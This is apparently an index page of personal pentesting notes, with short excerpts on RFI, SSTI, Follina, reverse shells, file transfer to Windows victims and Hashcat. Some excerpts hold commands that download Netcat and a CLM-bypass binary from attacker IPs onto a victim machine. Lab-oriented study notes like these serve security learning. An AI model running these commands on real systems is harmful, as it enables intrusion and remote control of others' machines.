Shuciran Pentesting Notes

PHP RFI

RFI Remote File Inclusion bypassing .htaccess If by any chance you are able to upload a file remotely to a server but you can’t see the content due to a PHP restriction: Try using another ...

Outdated (Medium)

Host: 10.10.11.175 If Active Directory => Synchronize your NTP with the domain controller: ntpdate 10.10.11.175 Content SMB Enumeration Follina Exploitation Reverse Shell with Invoke-P...

DotNet Project Compilation

C# Compilation Project If we get a C# project that is not compiled, for example SharpWSUS, we can compile it with Visual Studio on a Windows machine; follow these steps: Download the project onto your mach...

Fully Interactive TTY (Windows)

ConPTY 1) Download the Invoke-ConPTYShell.ps1 script on our local machine. 2) Modify the final line of the script as follows: exchange the IP and remote port of our local machine as well as the stt...

RCE via SSTI

Server-side template injection vulnerabilities can expose websites to a variety of attacks depending on the template engine in question and how exactly the application uses it. In certain rare circ...

Worker (Medium)

Host entries 10.10.10.203 N/A If Active Directory => Synchronize your NTP with the domain controller: ntpdate 10.10.10.103 Content SVN - Subversion Enumeration Information Leakage VHos...

WinRM Certificate (password-less) based authentication

WINRM Certificate We can authenticate via WinRM by creating a certificate; this is an AD CS feature. As we can check in these notes, all we need to do is follow these steps: Pre-requisites: Access...

Windows File Transfer

Upload the Netcat executable for Windows. From the victim machine: curl http://10.10.16.4/nc.exe -o nc.exe Examples: [[StreamIO#^40a776]] Network File System through SMB First create the share with impacket...

Powershell Download

iwr (Invoke-WebRequest) Transfer a file with the following command: PS> iwr -uri http://10.10.14.4/PsBypassCLM.exe -OutFile PsBypassCLM.exe Execute these commands to create wget.ps1 on the victim m...

Hashcat

Identify the hash type If you want to know the type of a password hash you can run the following command on your machine: hashcat.exe -j -m hash.txt And it will print the type: Hash-mode was not...